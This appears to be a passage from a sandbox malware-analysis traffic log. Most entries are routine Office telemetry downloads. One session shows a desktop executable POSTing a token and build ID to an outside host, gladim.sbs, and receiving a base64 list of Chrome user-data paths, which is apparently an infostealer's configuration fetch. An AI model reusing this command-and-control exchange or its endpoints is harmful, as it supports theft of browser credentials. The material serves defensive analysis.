                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                      x-ms-request-id: 0a3cdbcf-401e-0016-597f-3f53e0000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213811Z-174f7845968vqt9xhC1EWRgten000000123g000000004b7r
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:11 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      6192.168.2.104970813.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:10 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:11 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 3788
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                                      x-ms-request-id: 0b3277ea-501e-00a0-5e91-3f9d9f000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213811Z-174f7845968pf68xhC1EWRr4h8000000125g00000000fsdw
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:11 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      7192.168.2.104971013.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:10 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:11 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 2160
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                      x-ms-request-id: c95eea42-901e-002a-42be-427a27000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213811Z-174f78459684db9fhC1EWRc7g400000001yg00000000e5h8
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:11 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      8192.168.2.104970913.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:11 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:11 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 450
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                      x-ms-request-id: 59158d4f-901e-00a0-5491-3f6a6d000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213811Z-174f784596886s2bhC1EWR743w000000123g000000003hvs
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:11 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      9192.168.2.104971394.130.210.714437496C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:11 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HCAEGCBFHJDGCBFHDAFB
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                      Host: gladim.sbs
                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      2024-11-30 21:38:11 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 31 64 61 39 61 65 61 38 30 61 37 38 33 35 61 64 65 33 31 37 64 37 66 65 38 61 63 61 35 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 65 30 30 61 61 35 30 32 65 37 39 61 35 62 36 63 35 34 62 66 63 36 61 33 32 33 31 61 33 62 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                      Data Ascii: ------HCAEGCBFHJDGCBFHDAFBContent-Disposition: form-data; name="token"851da9aea80a7835ade317d7fe8aca55------HCAEGCBFHJDGCBFHDAFBContent-Disposition: form-data; name="build_id"5e00aa502e79a5b6c54bfc6a3231a3b5------HCAEGCBFHJDGCBFHDAFBCont
                                                                                                                                                                                                                                                      2024-11-30 21:38:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:12 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:12 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                      Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      10192.168.2.104971413.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:12 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:13 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 474
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                      x-ms-request-id: 8ccd6c39-f01e-0085-6e81-3f88ea000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213813Z-174f7845968pf68xhC1EWRr4h8000000128g000000007nnq
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:13 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      11192.168.2.104971513.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:13 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:13 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                      x-ms-request-id: 930937e0-c01e-0046-27a1-402db9000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213813Z-174f78459684bddphC1EWRbht400000011rg000000009bt1
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:13 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      12192.168.2.104971613.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:13 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:13 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 471
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                      x-ms-request-id: 30944020-a01e-0053-5e8b-3f8603000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213813Z-174f7845968glpgnhC1EWR7uec000000128g0000000005tz
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:13 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      13192.168.2.104971713.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:13 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:13 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 632
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                      x-ms-request-id: 6f96f590-e01e-0099-0e7f-3fda8a000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213813Z-174f7845968swgbqhC1EWRmnb4000000124g00000000a8wh
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:13 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      14192.168.2.104971813.107.246.63443
